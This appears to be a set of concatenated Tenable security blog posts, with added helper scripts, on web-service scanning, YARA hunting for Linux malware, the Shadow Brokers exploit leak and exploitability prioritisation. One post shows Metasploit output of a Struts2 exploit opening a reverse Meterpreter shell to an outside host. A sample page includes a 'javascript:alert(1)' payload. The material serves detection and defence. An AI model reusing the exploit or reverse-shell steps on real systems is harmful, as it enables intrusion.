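A local approximation of what that matrix counts, added as an example rather than code from the post or from the plugin itself: it pulls the scheme from every absolute URL in a page's href, src and action attributes and reports the ones outside an allow-list. The HTML is constructed for the example, and the allow-list of http and https is an assumption you would replace with your own.

```shell
#!/bin/sh
# Added example, not from the Tenable post. Lists URL schemes referenced by an
# HTML page and flags those outside an allow-list. SAMPLE_HTML is constructed.

# Print the lower-cased, de-duplicated schemes referenced by HTML on stdin.
# Only absolute URLs (scheme followed by ':') in href/src/action attributes
# count; relative links have no scheme and are ignored.
extract_schemes() {
    grep -oiE '(href|src|action)="[a-z][a-z0-9+.-]*:' \
        | sed -E 's/^[^"]*"//; s/:$//' \
        | tr 'A-Z' 'a-z' \
        | sort -u
}

# Report schemes from HTML on stdin that are not in the space-separated
# allow-list $1, one per line.
unexpected_schemes() {
    allow=" $1 "
    extract_schemes | while read -r scheme; do
        case "$allow" in
            *" $scheme "*) ;;
            *) echo "$scheme" ;;
        esac
    done
}

# Constructed page: one relative link, one upper-cased scheme, and three
# schemes (ftp, about, javascript) that a web scan would flag as unexpected.
SAMPLE_HTML='<html><body>
<a href="https://example.com/docs">docs</a>
<a href="/local/page">relative</a>
<img src="HTTP://cdn.example.com/logo.png">
<a href="ftp://files.example.net/pub/tool.tgz">download</a>
<a href="about:blank">blank</a>
<a href="javascript:alert(1)">click</a>
</body></html>'

# Run the sample through the check with http and https allowed.
check_sample() {
    printf '%s\n' "$SAMPLE_HTML" | unexpected_schemes "http https" | paste -sd ' ' -
}
```

Run `check_sample` to see the three flagged schemes; pipe any saved page (for example the output of `curl -s`) into `unexpected_schemes "http https"` to triage a real host.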

Spotting the services

The Web Internet Services dashboard matrix provides indicators for the detection of 30 unique web services. The matrix uses the Web Servers plugin family to filter for plugins of particular concern, and the cells turn purple when a specific service or vulnerability is detected. I would recommend monitoring this information closely, since the presence of unexpected or unapproved web services could be indicative of an unauthorized or misconfigured device connecting to the network.

You can use an Advanced filter on the Vulnerabilities workbench to find detailed information about specific results. Applying a plugin family filter for the Web Servers family will display all the results reflected in this matrix. Adding a plugin name filter for keywords related to particular services will help you isolate the hosts causing a single indicator to turn purple.

[Screenshot: Advanced filter for plugin family names]

The SSL Plugins matrix narrows the focus to detections and vulnerabilities related to TLS and SSL. Using filters for plugin ID, CVE ID, and plugin output, the 30 cells change color when specific TLS- or SSL-related vulnerabilities are detected. Since weak TLS and SSL configurations are so commonly exploited, I like to keep a keen eye on these results. In a single glance I can get an overview of whether these protocols are in use and whether they are vulnerable to exploitation.

Validating the vulnerabilities

The Web Service Vulnerabilities by Port matrix displays the counts of detected vulnerabilities for specific web service ports by severity. The columns break out the counts by severity as well as exploitability to give you a clearer understanding of vulnerability. HTTP/HTTPS, HTTP Management, Proxy, SOAP, and VNC services are specifically identified by port number. You will likely want to prioritize the identification and remediation of hosts that have critical or exploitable vulnerabilities; use Advanced filters to track down hosts that use specific ports and have critical or exploitable vulnerabilities.

[Screenshot: Web Service Vulnerabilities by Port matrix]

The Hosts with Web Service Vulnerabilities by Plugin Family matrix provides counts of plugin results from four different families by severity. The four families included are CGI Abuses, Databases, FTP, and Web Services. The columns display counts for each severity as well as for exploitability. By prioritizing the areas with critical and exploitable vulnerabilities, I can more effectively secure my network against intrusion and infection. Oftentimes simply applying the patches, updates, or upgrades needed to remediate a critical vulnerability will also take care of others.

To track down the most severely impacted hosts, use an Advanced filter for the plugin family, severity, or exploitability. This can help to identify the hosts that are affected by relevant vulnerabilities and give insight into how to respond:

[Screenshot: Advanced filter for multiple factors]

A variety of other Advanced filters can be used to investigate scan results related to web services. For example, adding a filter for CPE, hostname, or vulnerability state can help to focus efforts on securing web services in your environment.

Reducing risk

As you have likely inferred through reading this review of the Web Services Indicator dashboard, the primary goal is the ability to monitor the degree of vulnerability due to web services. Gaining insight into the available links, malicious and benign, enables you to ensure that your users can connect where they need to without exposing your organization to exploitation. The information in this dashboard also enables you to detect outdated configurations that should be targeted for removal or upgrade in order to dramatically reduce the risk of exploitation. With the ability to focus the lens on web service vulnerabilities by port, protocol, or plugin family, you can be ready to demonstrate where the organization’s greatest risk lies. By gathering all this insight, you can be prepared to enlighten your organization’s leadership and garner the support you need to effectively defend your network.

Try Tenable.io

Tenable.io provides accurate information on how well your organization is addressing security risks, and helps track improvements over time. Try Tenable.io Vulnerability Management free for 60 days.

Hunting Linux Malware with YARA

Tenable recently released two new YARA plugins to complement the existing Windows YARA plugin: YARA Memory Scan (Linux) and YARA File Scan (Linux/Solaris). The plugins bring YARA functionality to Linux and Solaris hosts. This blog discusses a couple of scenarios in which these plugins are useful.

Memory scanning

There’s been a lot of chatter about the recent Struts 2 remote code execution vulnerability CVE-2017-5638. Much of the excitement is due to the active exploitation of the vulnerability in the wild. In response, we’ve published a blog explaining how to use Nessus to detect the vulnerability.

[Screenshot: Web server scan for the Apache Struts vulnerability]

There are several approaches to determining whether the vulnerable server pictured above has been exploited, and a few existing Nessus plugins can help, for example the Linux MD5 scanner (plugins 71261 and 91223) and the Linux process reputation plugin (71261). Another approach is to use YARA to scan the system for malicious files or processes. For example, what if the attacker used Metasploit's new module for CVE-2017-5638 to execute a payload on the server?

msf exploit(struts2_content_type_ognl) > run

[*] Started reverse TCP handler on 52.93.5.12:4444
[*] Sending stage (2849752 bytes) to 128.183.27.101
[*] Meterpreter session 5 opened (52.93.5.12:4444 -> 128.183.27.101:45862) at 2017-03-24 07:40:53 -0400

meterpreter > shell
Process 10727 created.
Channel 1 created.
whoami
albinolobster

File scanning won’t be good enough here because the payload is deleted from disk shortly after gaining execution. You’ll need to scan the system’s running processes. But first you need a YARA rule to describe the payload in memory.

The YaraRules project has a lot of great rules, but I couldn't find one that described Metasploit's initial stager or Mettle (the Unix meterpreter). So, I wrote my own rule and added it to Tenable's open source YARA rules repository. The rule relies on the observation that the stager is comprised of a single LOAD segment with the read, write, and execute flags all set, whereas a normally linked ELF has separate text and data segments:

import "elf"

rule single_load_rwe
{
     meta:
          description = "Flags binaries with a single LOAD segment marked as RWE."
          family = "Stager"
          filetype = "ELF"
          hash = "711a06265c71a7157ef1732c56e02a992e56e9d9383ca0f6d98cd96a30e37299"

     condition:
          // Exactly one program header, of type PT_LOAD, with read, write and
          // execute all set (parenthesised so the intent does not depend on
          // operator precedence).
          elf.number_of_segments == 1 and
          elf.segments[0].type == elf.PT_LOAD and
          elf.segments[0].flags == (elf.PF_R | elf.PF_W | elf.PF_X)
}

You can then scan all the running processes using the following command (note: there is a bug in YARA 3.5 and below that negatively affects Linux memory scanning. Do not use memory scanning with those versions):

albinolobster@ubuntu:~$ for pid in `ps -ef | awk '{print $2}'` ; do sudo yara ./rule_file.yar $pid 2> /dev/null; done
single_load_rwe 10716
single_load_rwe 10718
albinolobster@ubuntu:~$

From the output, you can see that the rule matched two processes: 10716 and 10718. The processes can be found in ps:

10601 pts/18   Sl+   14:25  |   |   \_ /usr/lib/jvm/java-8-openjdk- …
10716 pts/18   S+     0:20  |   |       \_ /tmp/konL6821804046402511623.exe
29565 pts/18   S+     0:00  |   |       |   \_ /bin/sh -c /bin/sh
29566 pts/18   S+     0:00  |   |       |       \_ /bin/sh
10718 pts/18   S+     0:00  |   |       \_ /tmp/konL6369286348563749691.exe
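A safer version of the one-line loop above, added here as an example and not taken from the post or from Tenable's plugins. It assumes a rule file at RULES (default ./rule_file.yar, the name used above) and a Linux /proc. It refuses to run on YARA releases affected by the memory-scan bug mentioned above, walks /proc rather than parsing ps (so the PID column header and the scanner's own process are not handed to yara), and for each hit prints the process's exe link and command line; an executable that was unlinked after launch, as the stager described above is, shows up as "(deleted)" in the exe link.

```shell
#!/bin/sh
# Added example, not from the Tenable post. Runs a YARA rule file against every
# running process and annotates each match with its executable and command line.
# Assumption: RULES points at the rule file (default ./rule_file.yar).
RULES="${RULES:-./rule_file.yar}"

# Return 0 if a YARA version string is new enough for Linux memory scanning
# (the post warns that 3.5 and below are buggy, so 3.6 or later is required).
yara_memscan_ok() {
    major="${1%%.*}"
    rest="${1#*.}"
    minor="${rest%%.*}"
    if [ "$major" -gt 3 ]; then return 0; fi
    if [ "$major" -eq 3 ] && [ "$minor" -ge 6 ]; then return 0; fi
    return 1
}

# List numeric PIDs under a proc root ($1), excluding this script's own PID,
# so the scanner never scans itself and no "PID" header reaches yara.
candidate_pids() {
    for d in "$1"/[0-9]*; do
        pid="${d##*/}"
        if [ "$pid" != "$$" ]; then echo "$pid"; fi
    done
}

# Describe one PID: its exe link (readlink appends " (deleted)" when the file
# was unlinked after exec) and its command line.
describe_pid() {
    exe="$(readlink "/proc/$1/exe" 2>/dev/null || echo '?')"
    cmd="$(tr '\0' ' ' < "/proc/$1/cmdline" 2>/dev/null || echo '?')"
    printf 'pid=%s exe=%s cmd=%s\n' "$1" "$exe" "$cmd"
}

# Scan every process; yara prints "<rule> <pid>" per match. Errors from kernel
# threads or processes that exit mid-scan are dropped, as in the post's loop.
scan_processes() {
    ver="$(yara --version)"
    yara_memscan_ok "$ver" || { echo "yara $ver has the memory-scan bug; refusing" >&2; return 1; }
    candidate_pids /proc | while read -r pid; do
        yara "$RULES" "$pid" 2>/dev/null | while read -r rule _; do
            echo "MATCH $rule: $(describe_pid "$pid")"
        done
    done
}

# Usage (as root, since reading another user's memory needs privileges):
#   . ./yara-procscan.sh && scan_processes
```

A match whose exe ends in "(deleted)" is the strongest signal here: the file YARA would have scanned on disk is gone, which is exactly why the post says file scanning is not enough for this payload.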

While this is great, manually running YARA on every server isn’t a scalable solution. Using YARA through Nessus makes scanning en masse much easier. Configuring Nessus to do the scan hasn’t really changed since previous YARA blogs (Threat Hunting with YARA and Nessus and GRIZZLY STEPPE Detection with Security Center). The only difference is that the new plugins require SSH credentials if you aren’t using agents and the memory scanning plugin requires escalated privileges. Below is the output from Nessus running YARA on the same hacked host:

[Screenshot: YARA Memory Scan results on the hacked host]

File scanning

In September 2016 the Mirai botnet became infamous for what was at the time the largest distributed denial of service (DDoS) attack ever recorded, against KrebsOnSecurity. Mirai was later used in a DDoS attack on Dyn that caused wide-scale outages across the internet.

What’s interesting about Mirai is that it is not technically sophisticated. At the time of the attacks, it spread by logging into IoT devices and routers using default SSH or Telnet credentials. However, no one ever came up with a solution to log into the affected devices and scan them for Mirai. This is largely due to the variety in the IoT and router ecosystems. A given device could be running a variant of Linux or it could be running a proprietary OS. The architecture could be MIPS, PowerPC, ARM, or something else entirely. The CPU could be big-endian or it could be little-endian.

For example, I have a Ubiquiti SOHO router on my LAN. The router has a MIPS (big-endian) processor, runs “Linux AirRouter” as the operating system, and provides much of the shell functionality via BusyBox. There is no easy way to get YARA on this device. There is no package repository. No Python. No compiler. You’d need to compile a MIPS version of YARA elsewhere and copy it onto the box.

However, we’ve done all that work for you in these plugins. Using Nessus, I can run YARA on my Ubiquiti router just by adding it to the targets list. Using Florian Roth’s (@cyb3rops) rule for Mirai I’m able to locate the malware on the device’s filesystem:

[Screenshot: YARA File Scan locating the malware]

Conclusion

Linux, and especially IoT devices, have not traditionally been an easy space to look for malware. With these new plugins, Tenable hopes to give you further insight into your hosts and the ability to hunt malware wherever it may hide.


Smart Cities Must be Secure Cities

If you’ve never heard the term “smart city” before, you are soon going to be hearing it a lot. Smart city technology uses data sensors and analytics, the IoT, information and communication technology to improve the efficiency of city services and the quality of our lives. Smart cities monitor and manage physical assets, infrastructure, connectivity, and information services that affect citizens on a daily basis.

The smart city vision

You have probably already experienced a small sample of what smart city technology can do for you. For example, have you ever approached a highway on-ramp that is controlled by a smart traffic light that manages traffic flow, alleviates congestion and reduces idling time? Do you have a smart meter at home that monitors your daily energy consumption and recommends scheduling appliance usage during non-peak hours? Have you used a smartphone app that tells you where the empty parking spaces are in an airport garage? On a very small scale, those are all examples of smart city technology at work.

On a grander scale, imagine a city in which autonomous buses shuttle employees to work via the most efficient route, reducing individual automobile emissions and improving rush hour traffic flow. Or a virtual grid of sensors that relay data to a central processor to determine where air pollution is at critical levels, or where earth tremors are signaling a potential quake, warning the public of an impending emergency. Or Dedicated Short Range Communications (DSRC) devices in cars that eliminate the need for parking meters.

Does that sound like the Jetsons? Think again. This is reality, in places like Singapore, Columbus Ohio, and Barcelona where smart city technology is being deployed. As more people move into cities and urban sprawl increases, integrated services and system efficiencies are critical to our quality of life. Smart city technologists envision community-wide free Wi-Fi, autonomous public transportation, DSRC traffic flow control, smart street lighting, energy efficiencies, data sensors across the city to collect and analyze metrics, and IoT devices in every smart building.

Public/private partnerships

Smart city initiatives are being planned and funded by both government agencies and commercial firms, with many projects undertaken as public/private partnerships. For example, the U.S. Department of Transportation’s Smart City Challenge is working with Columbus, Ohio (and other finalist municipalities) to implement smart transportation systems that improve traffic flow, reduce transportation costs, and create more efficient systems. The state of Illinois is going after the title of “first smart state” with the 2016 creation of a statewide agency overseeing smart technology across the state, from digitizing public health care services to installing energy efficient street lights.

I recently had the privilege of meeting with Governor Terry McAuliffe of Virginia. As chair of the National Governors Association (NGA), McAuliffe has announced that Meet the Threat is his focus for the NGA this coming year to improve cybersecurity strategies and practices nationwide. He is also working with mayors from four Virginia cities who have submitted proposals to the ongoing DOT Smart City Challenge program. McAuliffe’s initiatives illustrate the reality that cybersecurity is no longer an IT issue – it is a public safety issue, an infrastructure issue, an executive issue that touches all aspects of our lives. Security must be planned for and funded as an integral part of each and every technology initiative.

The technology

Clearly, smart cities are welcome if the technology truly improves our lives. But it can be alarming if our privacy is at further risk. Since these smart city initiatives are just beginning, we have an opportunity and obligation to take the time to make sure that security is an integral part of the overall design. If smart city technology is not secure, we are not only putting our systems at risk, we are risking the safety and lives of the citizenry as well.

In many respects, smart city technology is simply a scaling of our existing technology – an expansion of networks, data repositories, the IoT, and wireless communications. That means bigger networks, expansive cloud-based services, more IoT devices and interconnected devices – infrastructure that moves beyond enterprise walls and permeates all aspects of our lives. That also means more opportunities for adversaries to take advantage of security weaknesses.

Smart technology is not smart enough without security that is completely integrated into the smart devices and applications from the outset. And smart security must scale along with the technology and infrastructure changes.

Smart security at the city level

Take the City of San Diego as an example. As the eighth largest city in the U.S., San Diego operations include 24 networks and 40 departments all running 24/7, from traffic control to library services, from the police department to waste management. With over a million cyberattacks per day, the city’s infrastructure cannot afford anything but the most comprehensive and trustworthy security to prevent potential disruptions and catastrophic losses. With the help of Tenable’s security solutions, the city inventoried all of their systems, deployed active and passive scanning, identified hundreds of at-risk devices to patch or decommission, and implemented continuous security monitoring to protect all assets across the city. City officials estimate that they are saving over one million dollars per year by reducing their threat exposure and strengthening their security against potential breaches. And with the continual development and expansion of Tenable services, security is growing as San Diego enters the smart city era. No asset goes live without a thorough scan and configuration audit.

“Design in” security

There is an old adage that says, “plan, plan, plan and then execute.” I urge all politicians, state and local officials, urban planning and development organizations to take a step back, collaborate and design security into the vision of the smart city. The time spent to get it right out of the gate will save taxpayers significant sums in the future by not having to compensate for security issues later with people, technologies and programs when it could have been designed in from the start.

NIST Cybersecurity Framework 1.1

Measuring and Demonstrating Cybersecurity – Is it a Pipe Dream?

On April 10, the comment period closed for the NIST revised Framework for Improving Critical Infrastructure Cybersecurity (Framework). The current draft includes expanded explanations, refinements and a completely new section: Measuring and Demonstrating Cybersecurity.

Measuring and demonstrating cybersecurity to business leaders and partners is simultaneously very important and very challenging. Various sources, including the EisnerAmper accounting firm and the National Association of Corporate Directors, have reported that only about 20% of boards have confidence in the state of their organization’s cybersecurity. Clearly measuring and demonstrating cybersecurity is important to boards.

Unfortunately, measuring and demonstrating cybersecurity is not easy. The first issue is measuring cybersecurity posture. This is typically performed by auditing cybersecurity activities and outcomes to determine if controls are implemented correctly, operating as intended and producing the desired outcome. The second — and in my opinion —much more difficult issue is accurately correlating cybersecurity activities and outcomes to desired business objectives.

We could consider many examples of business objectives, but consider the example cited in the draft Framework: a retail bank wanting to increase the number of online banking customers may do so by implementing stronger authentication. The draft Framework readily admits that achieving an increase in online banking customers is also contingent upon:

  • Developing messages regarding trusted online transactions
  • Targeting specific consumer demographics
  • Selecting communication channels that are most meaningful to those demographics
  • Marketing through those communication channels over the necessary timeframe to achieve the objective

Correlating cybersecurity with business objectives — a laudable goal

Clearly, it would be difficult to separate the effects of stronger authentication from the above-listed communication factors to calculate the impact on the number of online banking customers. Even if it were possible, communication factors are only one of the variables that would need to be isolated to measure the impact of stronger authentication on online banking customers. Ideally, measuring the impact of stronger authentication would require a controlled experiment that isolates marketing communications, the economy, the competitive environment, sales promotions, training and other factors.

As much as I applaud the Framework’s goal of measuring cybersecurity and correlating it with business objectives, I think it remains a long-term aspiration for most organizations. Most organizations are challenged to measure cybersecurity in a meaningful way.

Measuring cybersecurity remains a significant, but achievable, challenge

Most security organizations struggle to communicate timely security status to business leaders and business partners. Synchronizing volumes of data across multiple sources and abstracting it in a manner that makes sense to business leaders is a difficult challenge. However, it is a challenge that can be addressed today.

Tenable Assurance Report Cards (ARCs), available through SecurityCenter Continuous View® (SecurityCenter CV), make this task much easier. ARCs bridge the communication gap between security professionals and business executives by visually communicating the status of the most critical security controls in a familiar report card format.

SecurityCenter CV includes multiple ARC templates to measure technical control status across the NIST Cybersecurity Framework’s Identify, Protect and Detect functions. At the highest abstraction level, ARCs present pass/fail status. The screenshot below shows six ARCs – two passing and four failing. You can easily tailor an ARC to scope it to report on a specific business system so you can communicate status to the business owner.

[Screenshot: Six CSF Assurance Report Cards]

Evaluation of multiple policy tests determines an ARC’s pass/fail status. The rows of small green check marks and red Xs indicate which policy tests have passed and failed, respectively. When all policy tests pass, the overall ARC achieves passing status.

The screenshot below shows the specific policy tests evaluated for the CSF IDENTIFY. Asset Management (ID.AM) ARC. You can add, delete or edit policy tests as needed to assess your environment.

[Screenshot: Policy tests for the CSF IDENTIFY. Asset Management ARC]

Accurately correlating cybersecurity status to business objective attainment is not a pipe dream, but it will likely remain a stretch goal into the foreseeable future. However, you can start communicating security status based on the NIST Cybersecurity Framework today. ARCs deliver security status in a format that your organization’s business leaders and partners can understand.

"Measuring state and trends over time, internally, through external audit, and through conformity assessment, enables an organization to understand and convey meaningful risk information to dependents, partners, and customers." [NIST CSF 1.1]

For more information

Learn more about how Tenable SecurityCenter Continuous View supports the NIST Cybersecurity Framework.

What the Latest Shadow Brokers Dump Means for Your Business

Last week the hacker group known as Shadow Brokers published on the internet a large cache of weaponized software exploits and hacking tools targeting numerous vendor products. This fifth release appears to be the largest and most damaging to date, featuring several previously unknown exploits in widely used enterprise IT products and details on alleged U.S. capabilities to access and monitor SWIFT banking transactions. The sheer size of this leak made this weekend a challenging one for CISOs all over the world as they rushed to make sure that they weren’t vulnerable to these new exploits before attackers started using them.

The good news is that there appears to be a patch available for just about everything in the package. In some cases — such as the exploits for Windows XP and Windows Server 2003 — there will never be any patch since support for those products has long since been discontinued. Any CISOs who still have these older systems on their networks are now vulnerable to attack and will be defenseless targets to anyone who is able to get a foothold on those networks.

Many of the patches for the exploits provided by the Shadow Brokers have only just recently been released, meaning that many organizations may have not had time to run those patches through their patch management processes and get them applied to their critical systems. Of course, just because a patch is available doesn’t automatically mean your organization is safe. The pervasiveness and severity of some of the vulnerabilities in this drop makes it critical that you’re able to properly prioritize and patch every affected system in your environment.

In some cases, those patches may never be applied, whether due to a conscious decision to preserve the operational status of a crucial system, or due to imperfect knowledge about what is on the network and the impact of those blind spots on overall security. MS08-067 is an excellent historical example. This critical vulnerability from 2008 lived on for years within organizations and was the first thing penetration testers looked for when compromising a network. MS17-010 has now taken that role. Although a patch is available, there will always be one machine that someone overlooked, and a penetration tester or an attacker will find it and use it to compromise your network.

This is why conducting a proper system inventory is of such high importance to any commercial organization or government agency. You can’t protect what you don’t know. You can’t patch it either.

The Tenable research team spent the weekend reviewing the files released by the Shadow Brokers. Here are the highlights:

  • Microsoft patched vulnerabilities in all supported versions of Microsoft software.
  • Unsupported software such as IIS 5/6, Windows 2000/XP/Vista/Server 2003 and Exchange 2007 is vulnerable and will not be patched; upgrade to supported versions.
  • Disable SMBv1. Microsoft and CERT have long recommended disabling SMBv1 where possible.
  • A toolkit is already being leveraged to push Cobalt Strike, Metasploit, PoisonIvy, Empire and other payloads that are available as DLLs using DLL injection.

Tenable coverage and solutions

We have developed a SecurityCenter® dashboard tailored to identify hosts that may be susceptible to the vulnerabilities and exploits published by the Shadow Brokers hacking group. The Shadow Broker Vulnerability Detection dashboard is available through the SecurityCenter Feed to provide insight into the vulnerability of your network and the progress made toward upgrading outdated hosts.

[Screenshot: Shadow Brokers Vulnerability Detection dashboard]

The Tenable Research Team has many plugins already available to address these vulnerabilities. We are also actively developing new plugins specific to this package. Here are the relevant solutions; we will continue to update this post as more plugins become available.

Exploit                                                      | Plugin Title/Comments                                                                                           | Plugin ID
-------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------|----------
EternalBlue, EternalChampion, EternalSynergy, EternalRomance | MS17-010: Security Update for Microsoft Windows SMB Server (4013389)                                            | 97737
EmeraldThread                                                | MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290)                      | 49219
EskimoRoll                                                   | MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780)                                  | 79311
EducatedScholar                                              | MS09-050: Microsoft Windows SMB2 _Smb2ValidateProviderCallback() Vulnerability (975497)                          | 40887
                                                             | MS09-050: Vulnerabilities in SMBv2 Could Allow Remote Code Execution (975517)                                     | 42106
EclipsedWing                                                 | MS08-067: Microsoft Windows Server Service Crafted RPC Request Handling Remote Code Execution (958644)            | 34477
                                                             | MS08-067: Microsoft Windows Server Service Crafted RPC Request Handling Unspecified Remote Code Execution (958644) | 34476
EsteemAudit                                                  | Microsoft Windows XP Unsupported Installation Detection                                                          | 73182
                                                             | Microsoft Windows Server 2003 Unsupported Installation Detection                                                 | 84729
ExplodingCan                                                 | Microsoft IIS 6.0 Unsupported Version Detection                                                                  | 97993
EMPHASISMINE                                                 | Lotus Domino Unsupported Product                                                                                 | 97994
EnglishmanDentist                                            | Microsoft Exchange Server Unsupported Version Detection                                                          | 22313
DOUBLEPULSAR                                                 | SMB Server DOUBLEPULSAR Backdoor / Implant Detection                                                             | 99439

Many thanks to the Tenable research team for their contributions to this blog.

How Exploitable Are You?

Tenable.io Vulnerability Management

As part of the vulnerability management team I am often asked, “Just how exposed are we to the vulnerabilities in this report?” Thinking about the question, I like to first understand the relationship between vulnerability and exploitability. Next, I want to understand the likelihood a vulnerability can be exploited. From these two steps, I can begin to communicate the exploitability of our assets to management and data owners. Tenable.io helps you better understand the question “How Exploitable are You” by the data presented in the Exploitable by Malware dashboard.

Exploitable by Malware Dashboard

Vulnerabilities

In computer security, a vulnerability is a weakness that enables a malicious or unsuspecting user to gain access to privileged or unauthorized information. In the simplest form, a misconfiguration of file-level permissions can grant unauthorized users access to a file, folder, application, or service. In a more complex example, chunks of uninitialized memory may be mixed with valid data, as was discovered in Cloudflare services. Regardless of how simple or complex the vulnerability, the question quickly becomes: can the vulnerability be exploited?

Exploits

An exploit is a piece of software, string of data, or series of commands that can be used to cause unintended or unanticipated behavior in a computer system. Developing the code used to exploit a system can be very difficult in some cases and very simple in others.

Frameworks

Several well-known security researchers decided that to truly test and understand the nature of exploiting a vulnerability, a framework was needed. A framework is an abstraction in which the foundation of the software provides the generic functionality, and users write code modules to perform specific tasks. In this case, the developers of Metasploit, Core Impact and several others created frameworks that provide common attack techniques and delivery methods, while the users of the framework create the actual exploits. These frameworks can be used by inexperienced attackers to create an attack that may look much more sophisticated than their skill would suggest, because most of the hard work has already been done by the framework. Once you understand how to use the framework to exploit a buffer overflow, replicating the attack can seem trivial. As the frameworks become more popular, the industry is seeing a rise in malware that may have been developed using them.

The Tenable.io solution

Tenable.io™ can easily identify systems that are more exploitable than others. There are several exploitability-related search fields, along with several fields that relate to common exploit frameworks. When using the Workbench, select the Advanced link and then add filters:

Filter for exploitability

Now that you are able to identify the most exploitable assets, you can determine whether those systems are exploitable by known malware or by exploit frameworks. The field called Exploitable by Malware means that an exploit is known to exist in the wild. When performing the threat analysis, I like to include this as a key factor in assessing the risk to the asset. When identifying the assets that are exploitable by malware, I try to understand why the asset has not been patched. All too often, systems are not getting patched due to inconsistent patch cycles, inadequate patch management solutions, and an overall lack of understanding about how the applications process data. Gaining an understanding of an application’s business function and its criticality to overall business needs will lead to a more successful vulnerability management program.
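To show how those filters translate into a prioritized list, here is an added example (not Tenable's code) that ranks hosts from a vulnerability export by whether each finding is exploited by malware in the wild, has a module in a common exploit framework, or merely has an exploit available. The flag names are assumed to mirror Tenable plugin attributes, and all findings are constructed sample data; only plugin IDs 97737 and 49219 come from the post's table.

```python
"""Rank hosts by exploitability from a Tenable.io-style vulnerability export.

Added example, not Tenable's code. The flag names are assumed to mirror Tenable
plugin attributes; every finding below is constructed sample data, not scan output.
"""
from collections import defaultdict

FIELDS = ("host", "plugin_id", "severity", "exploit_available",
          "exploited_by_malware", "exploit_framework_metasploit", "exploit_framework_core")
# Constructed findings: one row per (host, plugin). Plugin IDs 97737 and 49219
# come from the post's table; the other plugin IDs are placeholders.
FINDINGS = [dict(zip(FIELDS, row)) for row in [
    ("10.0.0.5", 97737, 4, True, True, True, True),       # MS17-010 (page table)
    ("10.0.0.5", 12345, 2, False, False, False, False),   # placeholder plugin id
    ("10.0.0.9", 49219, 4, True, False, True, False),     # MS10-061 (page table)
    ("10.0.0.12", 67890, 3, True, False, False, False),   # placeholder plugin id
    ("10.0.0.20", 11111, 3, False, False, False, False),  # placeholder plugin id
]]

FRAMEWORK_FIELDS = ("exploit_framework_metasploit", "exploit_framework_core")


def exploitability_score(f):
    """Weight one finding: in-the-wild malware outranks framework modules, which
    outrank a bare 'exploit exists' flag. Weights are illustrative, not Tenable's."""
    score = 0
    if f["exploited_by_malware"]:
        score += 100
    score += 10 * sum(f[k] for k in FRAMEWORK_FIELDS)
    if f["exploit_available"]:
        score += 1
    return score * f["severity"]


def rank_hosts(findings):
    """Aggregate per host; return (host, summary) pairs, most exploitable first."""
    per_host = defaultdict(lambda: {"score": 0, "malware": 0, "frameworks": set()})
    for f in findings:
        h = per_host[f["host"]]
        h["score"] += exploitability_score(f)
        h["malware"] += int(f["exploited_by_malware"])
        h["frameworks"].update(k.rsplit("_", 1)[1] for k in FRAMEWORK_FIELDS if f[k])
    return sorted(per_host.items(), key=lambda kv: kv[1]["score"], reverse=True)


if __name__ == "__main__":
    for host, info in rank_hosts(FINDINGS):
        print(f"{host:<10} score={info['score']:<4} malware_hits={info['malware']} "
              f"frameworks={sorted(info['frameworks'])}")
```

The host carrying the MS17-010 finding lands at the top because it is both exploited by malware and covered by two frameworks; the host with only an "exploit available" flag ranks just above the one with nothing exploitable at all.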

Recently, in a discussion session with a university customer, we identified over 50 servers that had been running for over 4 years with no notable user activity. We reviewed the vulnerability state of these systems, and they were not only exploitable by malware, but also by many of the exploit frameworks. As we discussed how these systems could be either patched or removed, we began to see a bigger problem in the network. Many of the servers that were running were either underutilized or not used at all. We then discussed the mitigation strategies with IT operations and received a lot of pushback based on the fact that none of the current admins knew why the systems were online or who owned them. The customer ultimately chose to implement a lengthy review process with all department heads in an attempt to establish ownership.

Regardless of your approach to mitigating risks identified by Tenable.io, whether by applying patches, configuring mitigating controls, or hardening the operating system, the first step is to clearly qualify the risks into actionable tasks and deliverables. Tenable.io provides information security professionals with the tools and resources needed to perform a detailed qualitative analysis of the risk that threatens business assets. The Exploitable by Malware dashboard provides insight into your current risk exposure to exploitable vulnerabilities for both malware and exploit frameworks.


Try Tenable.io

Tenable.io provides accurate information on how well your organization is addressing security risks, and helps track improvements over time. Get a free trial of Tenable.io Vulnerability Management for 60 days.

 

Master Your Security Foundation: Know Your Devices


Knowing what assets you have is arguably the single most important security control. If you don’t know about a server, desktop, laptop, mobile device or network device, how can you manage and secure it? For that matter, what about cloud instances, virtual machines, and containers?


In Q4 of last year, Tenable and the Center for Internet Security (CIS) conducted a survey of 319 IT security decision makers at companies with more than 100 employees. We found that fewer than 50% of the surveyed organizations have implemented automated controls to inventory the systems and devices connected to their networks. I was alarmed by such low control adoption because, as the following table indicates, knowing what is on your network is an important control in virtually all security frameworks and compliance standards.

| Standard | “Know What You Have” Control Objective |
| --- | --- |
| PCI DSS | Maintain an inventory of systems that are in scope for PCI DSS. |
| NIST Cybersecurity Framework | Physical devices and systems are inventoried. |
| ISO/IEC 27002:2013 | Inventory of assets. |
| NIST 800-53 rev 4 | Information system inventory. |
| CIS Critical Security Controls | Inventory of authorized and unauthorized devices. |

CIS Critical Security Controls


The CIS Critical Security Controls (formerly the SANS Top Twenty) is a prioritized list of security controls developed by an international community of security professionals and institutions. The CIS rates Inventory of Authorized and Unauthorized Devices as the most important security control. This prioritization is designed to guide organizations to:

invest first in controls that will provide the greatest risk reduction and protection against the most dangerous threat actors and that can be feasibly implemented in your computing environment.

The phrase “can be feasibly implemented in your computing environment” deserves additional discussion because “feasibly implemented” does not translate to “easily implemented.” The control’s more detailed description:

Actively manage (inventory, track, and correct) all hardware devices on the network so that only authorized devices are given access and unauthorized and unmanaged devices are found and prevented from gaining access

offers insight about potential implementation challenges.

Managing devices by policy


The question of “What do you have?” has been expanded to “Are you identifying unauthorized devices and preventing them from accessing your network?” Preventing unauthorized device access starts with a policy, and organization management must buy into the policy and define any allowable exceptions. Otherwise, the policy will likely be undermined when influential people complain that they can’t connect their personal devices to the network.

Controlling which devices can connect to your network delivers benefits to both security and IT teams. From a security perspective, having only authorized devices on your network allows you to actively manage them to detect and remediate unauthorized software, misconfigurations, vulnerabilities and malware. Benefits also accrue to the IT organization. Having only authorized devices on the network increases network availability and eliminates the break-fix costs that inevitably result from troubleshooting problems often associated with one-off, unauthorized devices.

After the policy is established, automated supporting controls must be implemented to achieve the control objective.
